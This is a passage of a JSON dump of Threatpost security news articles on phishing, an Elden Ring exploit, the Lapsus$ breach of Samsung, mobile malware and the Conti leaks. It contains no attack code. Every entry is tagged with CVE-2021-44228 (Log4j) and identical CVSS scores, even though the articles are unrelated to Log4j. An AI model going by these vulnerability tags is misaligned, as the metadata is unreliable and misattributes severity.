continues to work,\u201d Tim Erlin, vice president of strategy at cybersecurity firm Tripwire, wrote in an email to Threatpost. \u201cIt only takes one user to click in order for the phishing campaign to be effective for the attacker.\u201d\n\nIt also remains dangerous because credential-stealing from victims is often a gateway attack that provides cybercriminals a way to engage in further and more disruptive attacks, such as defrauding people of money in financial accounts or ransomware attacks on corporate networks.\n\nMoreover, it remains difficult for an organization to prevent phishing attacks from success because they merely require human error rather than any compromise of infrastructure that the organization controls, Erlin added.\n\n\u201cWhile we try to address phishing with technological solutions, the problem remains a primarily human one,\u201d he said.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-04T13:28:01", "type": "threatpost", "title": "Attackers Target Intuit Users by Threatening to Cancel Tax Accounts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-04T13:28:01", "id": "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "href": "https://threatpost.com/attackers-intuit-cancel-tax-accounts/178219/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T19:25:29", "description": "The latest installment of the Dark Souls gaming franchise, Elden Ring, contains a security vulnerability that allows bad actors to throw players on PCs into an endless loop of losing their characters\u2019 lives, rendering it essentially unplayable.\n\nMalwarebytes Labs researcher Christopher Boyd [said Thursday](<https://blog.malwarebytes.com/hacking-2/2022/03/elden-ring-exploit-traps-players-in-infinite-death-loop/>) that the bug appears to be a remote code-execution flaw that is being exploited to render the game unplayable for victims.\n\nThe late February [release of Elden Ring](<https://www.fromsoftware.jp/ww/pressrelease_detail.html?tgt=20220316_eldenring_salesdata>) went off smoothly for a time, and PC players were able to access online play without incident. In fact, on March 16, the Tokyo-based company announced that the sandbox game had sold 1 million units in Japan and more than 12 million worldwide.\n\nThe backstory behind Elden Ring was written by George R.R. Martin, the author of the book used as the source material create the hit television epic, \u201cGame of Thrones.\u201d\n\n\u201cIt\u2019s astonishing to see just how many people have been playing \u2018Elden Ring,'\u201d FromSoftware CEO Hidetaka Miyazaki said. \u201cI\u2019d like to extend our heartfelt thanks on behalf of the entire development team. \u2018Elden Ring\u2019 is based on a mythological story written by George R. R. Martin. We hope players enjoy a high level of freedom when adventuring through its vast world, exploring its many secrets, and facing up to its many threats.\u201d\n\n## **Elden Ring\u2019s \u2018Death Loop\u2019 **\n\nThe smooth sailing ended about a week ago, when attackers found a way to break into PC players\u2019 games and throw their avatars into an endless loop of dying, coming back and quickly dying again, something Boyd referred to as a \u201cdeath loop.\u201d\n\n\u201cAfter the first time your character dies, you\u2019re supposed to respawn at locations resembling a bonfire, Instead, in the death loop scenario the victim simply continues to die over and over again,\u201d Boyd explained.\n\nOne player tweeted about the bug in the latest Souls\u2019 game.\n\n\u201cThere\u2019s an exploit going around on PC where hackers will corrupt your save file while you\u2019re invaded,\u201d the player tweeted. \u201cFirst, they will crash your game, and when you open it back up, your character will be constantly falling to their death\u2026\u201d\n\n> \u26a0\ufe0fElden Ring PSA for PC players\u26a0\ufe0f\n> \n> There's an exploit going around on PC where hackers will corrupt your save file while you're invaded. \n> \n> First they will crash your game, and when you open it back up, your character will be constantly falling to their death\u2026 [pic.twitter.com/8et3bl8T1I](<https://t.co/8et3bl8T1I>)\n> \n> \u2014 Mordecai (@EldenRingUpdate) [March 18, 2022](<https://twitter.com/EldenRingUpdate/status/1504958027925008387?ref_src=twsrc%5Etfw>)\n\nBoyd said no one is exactly sure what\u2019s going on, since FromSoftware hasn\u2019t released any specifics about the exploit.\n\n\u201cOne of the theories from players is that the invaders were able to edit their save files somehow while in game, or at least adjust some parameters related to the victim\u2019s save points,\u201d Boyd added. \u201cIn other words: You no longer spawn at the nearest bonfire. You respawn somewhere over the nearby ocean and die instantly on account of not being able to swim.\u201d\n\nThe only way for PC players to completely avoid the possibility of falling victim to the bug is to switch off online play, Boyd advised.\n\n\u201cAnyone trapped in a death loop has to attempt an ALT + F4/rapid-fire sequence of button presses in menus to try to manually respawn at a bonfire,\u201d Boyd said. \u201cThis, as it turns out, isn\u2019t easy to do.\u201d\n\nThe good news is that FromSoftware has released an [Elden Ring patch](<https://en.bandainamcoent.eu/elden-ring/news/elden-ring-patch-notes-1032>) for this exploit, as well as others impacting players. Players without the update will be barred from online play, the company added.\n\n## Other Dark Nights of the Soul for Dark Souls\n\nThis isn\u2019t the first time that the developer has faced issues with the Dark Souls series. Boyd pointed out that in January, leading up to the Elden Ring release, developer FromSoftware was confronted with a [similar RCE exploit](<https://threatpost.com/dark-souls-servers-down-rce-bug/177896/>) in Dark Souls 3 that forced it to shut down online play for PC players.\n\nThe flaw could allow attackers to do pretty much anything: As Kaspersky researchers [explained](<https://www.kaspersky.com/blog/dark-souls-dangerous-vulnerability/43436/>) at the time, the bug \u201callows an attacker to execute almost any program on the victim\u2019s computer, so they\u2019re able to steal confidential data or execute any program they wish\u201d \u2013 that includes installing malware, letting them access sensitive information or enabling them to rip off resources for [cryptocurrency mining](<https://threatpost.com/bogus-cryptomining-apps-google-play/168785/>).\n\nThe vulnerability also affected earlier games in the Dark Soul series, leading the developers to temporarily turn off player-versus-player (PvP) servers across Dark Souls Remastered, Dark Souls II and Dark Souls III. PvP refers to players being able to interact and duel with each other.\n\n\u201cHopefully the last we\u2019ll see of game invading/save locking/character murdering exploits along these lines,\u201d Boyd explained. \u201cSave points in Souls titles are supposed to be the one safe breathing space in the entire game. To have them corrupted or tampered with and cursed with instant death is probably a bridge too far for even the most hardcore of Souls players.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T19:23:12", "type": "threatpost", "title": "Just-Released Dark Souls Game, Elden Ring, Includes Killer Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T19:23:12", "id": "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "href": "https://threatpost.com/dark-souls-game-elden-ring-killer-bug/179090/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-31T14:20:09", "description": "Why in the world would a collection of nonfungible token (NFT) gorilla avatars called the Bored Ape Yacht Club (BAYC), run by 30-somethings using aliases like \u201cEmperor Tomato Ketchup\u201d and \u201cNo Sass\u201d and [adored by celebrities](<https://www.vanityfair.com/news/2022/02/bored-ape-yacht-club-revealed>), spiral on up to a [multibillion-dollar valuation](<https://www.coingecko.com/en/nft/bored-ape-yacht-club>) (\u2026and, by the way, how can you yourself get stinking crypto-rich?!)?\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/30153635/Bored-Ape-Yacht-Club-NFT-scaled-e1648669046321.jpeg>)\n\nImage of Bored Ape Yacht Club NFT.\n\nIf you don\u2019t have a clue, you might be one of the crypto-newbies for whom the New York Times recently pulled together its [Latecomer\u2019s Guide to Crypto](<https://www.nytimes.com/interactive/2022/03/18/technology/cryptocurrency-crypto-guide.html>) and whom [mutual funds companies](<https://www.fidelity.com/viewpoints/active-investor/beyond-bitcoin>) are trying to [ease into](<https://economictimes.indiatimes.com/markets/cryptocurrency/crypto-investment-in-mutual-funds-style-mudrex-launches-coin-sets/articleshow/87099763.cms?from=mdr>) the brave new world.\n\nYou also might have a thousand questions that go beyond cartoon apes and get into the nitty-gritty of how cryptocurrency and blockchain technologies work and how to sidestep the associated cybersecurity risks.\n\nThose risks are big, throbbing realities. The latest: Ronin, an Ethereum-linked blockchain platform for NFT-based video game Axie Infinity, on Tuesday put up a [blog post](<https://roninblockchain.substack.com/p/community-alert-ronin-validators?s=w>) advising that 173,600 ether tokens and 25.5 million USD coins \u2013 valued at nearly $620 million as of Tuesday \u2013 had been drained from its platform after an attacker used hacked private keys to forge two fake withdrawals last week.\n\nAccording to [Forbes](<https://www.forbes.com/sites/jonathanponciano/2022/03/29/second-biggest-crypto-hack-ever-600-million-in-ethereum-stolen-from-nft-gaming-blockchain/?sh=280f0f0c2686>), blockchain analytics firm Elliptic pegs it as the second-biggest hack ever.\n\n## New Technology, Old Hacks\n\nCryptocurrency and related technologies may be shiny new concepts, but the techniques crooks are using to drain them aren\u2019t necessarily newfangled. As of its Wednesday update, Ronin said that it looks like the breach was pulled off with old-as-the-hills social engineering:\n\n> \u201cWhile the investigations are ongoing, at this point we are certain that this was an external breach. All evidence points to this attack being socially engineered, rather than a technical flaw.\u201d \u20143/30/22 Ronin alert.\n\nDr. Lydia Kostopoulos, senior vice president of emerging tech insights at [KnowBe4](<https://www.knowbe4.com/>), stopped by the Threatpost podcast to give us an overview of this brave new world of blockchain: a landscape of new technologies that are making wallets swell and shrink and hearts to flutter in dismay when such things as the Ronin hack transpire.\n\nShe shared her insights into everything from how such technologies work to what the associated cybersecurity risks are, including:\n\n * How blockchain technologies, including NFTs, work.\n * The cybersecurity risks that might emerge from the use of NFTs/cryptocurrency, including popular scams/social engineering attempts circulating today.\n * Steps individuals/businesses can take to protect themselves.\n * What is driving their popularity and if NFTs are here to stay.\n * Regulations on blockchain technology.\n\nYou\u2019ve heard it a thousand times before, but Dr. Kostopoulos says it\u2019s real: Blockchain technology is transformative. Look out for state-backed currencies and blockchain-enabled voting that can\u2019t be tampered with, for starters. Look for NFT invitations to artists\u2019 performances that keep giving as those artists reward their ticket holders with future swag. And for the love of Pete, don\u2019t lose your cold wallets if you want to keep your crypto safe.\n\nIf you don\u2019t yet know what a cold wallet is, definitely have a listen!\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/032522_KnowBe4_Lydia_mixdown_2.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-31T13:00:09", "type": "threatpost", "title": "A Blockchain Primer and Bored Ape Headscratcher \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-31T13:00:09", "id": "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "href": "https://threatpost.com/a-blockchain-primer-and-a-bored-ape-headscratcher-podcast/179179/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T19:35:26", "description": "Just days after leaking data it claims to have exfiltrated from chipmaker NVIDIA, ransomware group Lapsus$ is claiming another international company among its victims \u2014 this time releasing data purportedly stolen from Samsung Electronics.\n\nThe consumer electronics giant confirmed in a [media statement](<https://www.bloomberg.com/news/articles/2022-03-07/samsung-says-hackers-breached-company-data-galaxy-source-code>) on Monday that a \u201csecurity breach\u201d had occurred related to internal company data \u2014 but said that customer and employee data were not impacted.\n\nLapsus$ had earlier announced on its Telegram channel that it had [breached Samsung](<https://securityaffairs.co/wordpress/128712/cyber-crime/samsung-electronics-lapsus-ransomware.html?utm_source=rss&utm_medium=rss&utm_campaign=samsung-electronics-lapsus-ransomware>) and offered a taste of what it had as proof, including biometric authentication information and source code from both Samsung and one of its suppliers, Qualcomm. That\u2019s according to Security Affairs, which also published a screen grab of the data leak.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07135942/lapsu-telegram-annoucement-screen-grab.jpg>)\n\nScreen capture of the Telegram message with data. Source: Security Affairs.\n\n\u201cIf Samsung\u2019s keys were leaked, it could compromise the TrustZone environment on Samsung devices that stores especially sensitive data, like biometrics, some passwords and other details,\u201d said Casey Bisson, head of product and developer relations at BluBracket, via email. \u201cThe TrustZone environment is useful because it creates a strong security barrier to attacks by Android malware.\u201d\n\nHe added that if the leaked data allows malware to access the TrustZone environment, it could make all data stored there vulnerable.\n\n\u201cIf Samsung has lost control of the signing keys, it could make it impossible for Samsung to securely update phones to prevent attacks on the TrustZone environment,\u201d he said. \u201cCompromised keys would make this a more significant attack [than NVIDIA](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), given the number of devices, their connection to consumers, and amount of very sensitive data that phones have.\n\n## **Ransomware Is Here to Stay **\n\nObviously, the implications of source code and thousands of employee credentials out in the open are serious. The [ransomware attacks](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>) on Samsung and NVIDIA, and even January\u2019s Lapsus$ attack on media outlets in Portugal, SIC Noticias and Expresso, should serve as a grim reminder that the [ransomware](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) business is booming, according to experts.\n\n> The websites of two of the main media organizations in Portugal [@expresso](<https://twitter.com/expresso?ref_src=twsrc%5Etfw>) and [@SICNoticias](<https://twitter.com/SICNoticias?ref_src=twsrc%5Etfw>) are down, after an apparent hacking, according to their parent company, Impresa. [pic.twitter.com/la2Pi9JRgG](<https://t.co/la2Pi9JRgG>)\n> \n> \u2014 Mia Alberti (@mialberti) [January 2, 2022](<https://twitter.com/mialberti/status/1477622312098840581?ref_src=twsrc%5Etfw>)\n\n\u201cRansomware is not going away,\u201d Dave Pasirstein, CPO and head of engineering for TruU told Threatpost by email. \u201cIt\u2019s a lucrative business that is nearly impossible to protect all risk vectors; however, it is made easy by enterprises failing to take enough precautionary steps.\u201d\n\n## **Ransomware Risk Vectors Abound **\n\nThose steps, according to Pasirstein, must include a zero-trust approach, an effective patching strategy, endpoint and email protection, employee training and strong authentication such as modern MFA. He added, \u201cideally, a password-less MFA that is not based on shared secrets and thus, cannot easily be bypassed by a server compromise.\u201d\n\nThe group\u2019s recent successes also highlight the need to protect data across the organization, Purandar Das, CEO of Sotero told Threatpost.\n\n\u201cObviously a very concerning development for Samsung and NVIDIA if true,\u201d he said. \u201cWhat this also demonstrates is the vulnerability of data in any data store within organizations.\u201d\n\nHe explained a common security approach is to focus on locking down structured data storage, which can be shortsighted.\n\n\u201cMost security has been focused on structured datastores with the assumption that the attackers are looking for confidential information that relates to individuals whether they are customers, consumers or employees,\u201d Das added. \u201cHowever, confidential or sensitive data is spread in more than just structured data stores.\u201d\n\nIn the case of Samsung, beyond releasing the company\u2019s competitive secrets, the Lapsus$ breach leaves the company open to future compromise, he warned.\n\n\u201cIn the case of Samsung, it would provide a pathway into any or many Samsung devices rendering them vulnerable in ways that wouldn\u2019t have been feasible,\u201d Das said. \u201cSecurity, or more importantly data-focused security, is essential. Securing the data is probably more critical or just as critical as todays security of attempting to lock down the perimeter.\u201d\n\n**_Register Today for [Log4j Exploit: Lessons Learned and Risk Reduction Best Practices](<https://bit.ly/3BXPL6S>) \u2013 a LIVE Threatpost event sked for Thurs., March 10 at 2PM ET. Join Sonatype code expert Justin Young as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T19:28:36", "type": "threatpost", "title": "Samsung Confirms Lapsus$ Ransomware Hit, Source Code Leak", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T19:28:36", "id": "THREATPOST:14D52B358840B9265FED987287C1E26E", "href": "https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-22T21:23:04", "description": "The number of cyberattacks launched against mobile users was down last year, researchers have found \u2014 but don\u2019t pop the champagne just yet. The decline was offset by jacked-up, more sophisticated, more nimble mobile nastiness.\n\nIn a Monday [report](<https://securelist.com/mobile-malware-evolution-2021/105876/>), Kaspersky said that its researchers have observed a downward trend in the number of attacks on mobile users, as shown in the chart below. However, \u201cattacks are becoming more sophisticated in terms of both malware functionality and vectors,\u201d according to Kaspersky experts Tatyana Shiskova and Anton Kivva.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/22151706/downware-mobile-malware-trend-e1645561041683.png>)\n\nNumber of attacks on mobile users, 2019\u20132021. Source: Kaspersky.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\n\u201cIn the reporting period, after a surge in H2 2020, cybercriminal activity gradually abated: There were no global newsbreaks or major campaigns, and the COVID-19 topic began to fade,\u201d according to Monday\u2019s report. \u201cAt the same time, new players continue to emerge on the cyberthreat market as malware becomes more sophisticated; thus, the fall in the overall number of attacks is \u2018compensated\u2019 by the greater impact of a successful attack. Most dangerous of all in this regard are [banking malware](<https://threatpost.com/xenomorph-malware-google-play-facehugger/178563/>) and [spyware](<https://threatpost.com/new-android-spyware-poses-pegasus-like-threat/176155/>).\u201d\n\nThe company\u2019s mobile products and technologies detected 97,661 new mobile banking trojans, along with 3,464,756 malicious installation packages and 17,372 new mobile ransomware trojans.\n\nThe number of malicious installation packages observed in 2021 actually dropped substantially, down 2,218,938 from 2020 and slightly down from the 3,503,952 packages discovered in 2019.\n\n## New Tricks for Mobile Banking Malware\n\nLast year, banking trojans learned a number of new tricks. For example, the Fakecalls banker, which targets Korean mobile users, is now \u201c[dropping] outgoing calls to the victim\u2019s bank and plays pre-recorded operator responses stored in the trojan\u2019s body,\u201d according to the report.\n\nOther old dogs learning new tricks include the Sova banker, which steals[ cookies](<https://encyclopedia.kaspersky.com/glossary/cookie/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), \u201cenabling attackers to access the user\u2019s current session and personal mobile banking account without knowing the login credentials.\u201d\n\nIn 2021, cybercriminals also went after mobile gaming credentials \u2013 which are often sold later on the darknet or used to steal in-game goods from users. Last year, for example, marked the first time that researchers spotted what they called a[ \u201cGamethief-type mobile trojan](<https://securelist.com/it-threat-evolution-q1-2021-mobile-statistics/102547/#quarterly-highlights>),\u201d aimed at stealing account credentials for the mobile version of PlayerUnknown\u2019s Battlegrounds (PUBG).\n\nAs well, the Vultur backdoor \u2013 found packed into a malicious, fully functional two-factor authentication (2FA) app discovered last month on Google Play \u2013 picked up the capability of using Virtual Network Computing (VNC) to snoop on targets by recording smartphone screens: \u201cWhen the user opens an app that is of interest to attackers, they can monitor the on-screen events,\u201d researchers said.\n\nOther trends spotted in 2021: fewer pandemic/COVID-19 topics used as bait, and more pop-culture lures, such as Squid Game. Kaspersky pointed to the [Joker trojan](<https://threatpost.com/updated-joker-malware-android-apps/167776/>) on Google Play, which was found masquerading \u201cas an app with a background wallpaper in the style of Squid Game.\u201d\n\n## Google Play Still Infested\n\nSpeaking of the malware-ridden Play Store, regardless of Google\u2019s attempts to scrub its app store clean, it\u2019s still a bit of a roach motel. ThreatFabric researchers recently sniffed out 300,000 banking trojan [infections](<https://threatpost.com/banking-trojan-infections-google-play/176630/>) in Google Play during a four-month period.\n\nKaspersky also called out what it said were \u201crepeat incidents of malicious code injection into popular apps through advertising SDKs,\u201d as in the \u201csensational\u201d case of [CamScanner](<https://threatpost.com/malicious-app-tallies-100-million-downloads/147748/>): a malicious app spotted in the Google Play store in August 2019 that tallied 100 million downloads.\n\nResearchers noted that they also found [malicious code](<https://threatpost.com/sophisticated-android-spyware-google-play/155202/>) inside ad libraries in [the official client](<https://securelist.com/apkpure-android-app-store-infected/101845/>) for the third-party marketplace known as APKpure, as well as in a [modified WhatsApp build](<https://threatpost.com/custom-whatsapp-build-malware/168892/>).\n\nOne example was particularly alarming, from a security hygiene perspective: the malicious, fully functional 2FA app that hung out in Google Play for [more than two weeks](<https://threatpost.com/2fa-app-banking-trojan-google-play/178077/>), managing to cling to 10,000 downloads. It came loaded with the Vultur stealer malware that targets and swoops down on financial data.\n\nAmong all of last year\u2019s many banking-trojans moves, researchers found the resurgence of Joker especially notable. The [malware](<https://threatpost.com/malicious-joker-app-downloads-google-play/177139/>), which zaps victims with premium SMS charges, popped up yet again on Google Play, in a mobile app called Color Message, after which it snuck into more than a half-million downloads before the store collared it.\n\nKaspersky researchers also called out the [Facestealer](<https://blog.malwarebytes.com/detections/android-trojan-spy-facestealer/>) trojan: a family of Android trojans that uses social engineering to rip off victims\u2019 Facebook credentials.\n\nThese trojans most commonly sneak into Google Play by masquerading as a legitimate app, such as a photo editor or VPN service, to which they add a small code snippet to decrypt and launch their payload, the researchers explained. To confound analysis, such malware often uses a command-and-control (C2) server to send unpacking commands that get carried out in multiple steps: \u201cEach decrypted module contains the address of the next one, plus instructions for decrypting it,\u201d they said.\n\n## Most of It\u2019s Still Adware\n\nAt 42 percent, adware was yet again the biggest slice of the mobile malware pie, even though it fell 14.83 percentage points over the prior year. In 2020, adware was also the No. 1 mobile menace, at 57 percent.\n\nNext in prevalence were potentially unwanted riskware apps at 35 percent: a share increase of 14 percentage points, after a sharp decline in 2019\u20132020. As [defined](<https://usa.kaspersky.com/resource-center/threats/riskware>) by Kaspersky, riskware are legitimate programs \u201cthat pose potential risks due to security vulnerability, software incompatibility or legal violations.\u201d\n\nIn third place were trojan threats at 9 percent: a share that rose by 4 percentage points year-over-year.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-22T21:00:36", "type": "threatpost", "title": "Gaming, Banking Trojans Dominate Mobile Malware Scene", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-22T21:00:36", "id": "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "href": "https://threatpost.com/gaming-banking-trojans-mobile-malware/178571/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T19:32:09", "description": "Thanks to gray-hat Ukrainian hacker ContiLeaks, the Conti ransomware gang [spilled its guts](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) in late February. Since then, researchers have been poring over the group\u2019s secrets, including a massive trove of chat logs and other doxxed data, including [source code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) for Conti ransomware, TrickBot[ malware](<https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/>), a decryptor and the gang\u2019s administrative panels.\n\nContiLeaks published these internal documents after the ransomware group\u2019s leaders posted an aggressively pro-Russian message on their official site in the aftermath of Russia\u2019s invasion of Ukraine.\n\nLast week, BreachQuest published the [findings](<https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/>) of its week-long deep dive into the data. In essence, BreachQuest found that Conti Group operates like a legitimate, above-board high-tech company that hires and even fires contractors and salaried employees alike.\n\nThe dump enabled researchers to sketch out a chart showing key figureheads and the roles they play to grow Conti\u2019s enterprise, plus details on:\n\n * Earnings and costs;\n * How they recruit;\n * Who are the leaders;\n * Who they target: small as well as big targets;\n * How they target and escalate attacks and how they receive payments;\n * How they find their victims;\n * Project Blockchain \u2013 Conti group\u2019s effort to create its own altcoin; and\n * A more thorough understanding of the tools used to spy on and compromise victims.\n\nMarco Figueroa, head of product at BreachQuest, dropped in on the Threatpost podcast to give us some of the intelligence gleaned from the leaked chat logs. Those logs show that over the course of 13 months, Conti spent about $6M on salary, monthly bonuses, tooling and services.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nIts HR team is indicative of how professionally Conti group conducts business: They offer \u201cemployee of the month\u201d and performance review programs, for example.\n\nIn short, Conti group considers itself a legitimate company. Many of its employees don\u2019t even know they\u2019re working for a cybercriminal outfit. Some probably choose to look the other way, but the turnover is still high: When they figure it out, they tend to vamoose.\n\nThat\u2019s probably one reason why Conti\u2019s training materials are the best Marco\u2019s ever seen: The group needs to document procedures because they constantly have to train new contractors.\n\nIn fact, security teams themselves should take the training, Marco says, to find out how the ransomware outfit successfully trains its regrettably top-notch cyberattackers.\n\nBy the way, after BreachQuest\u2019s report was 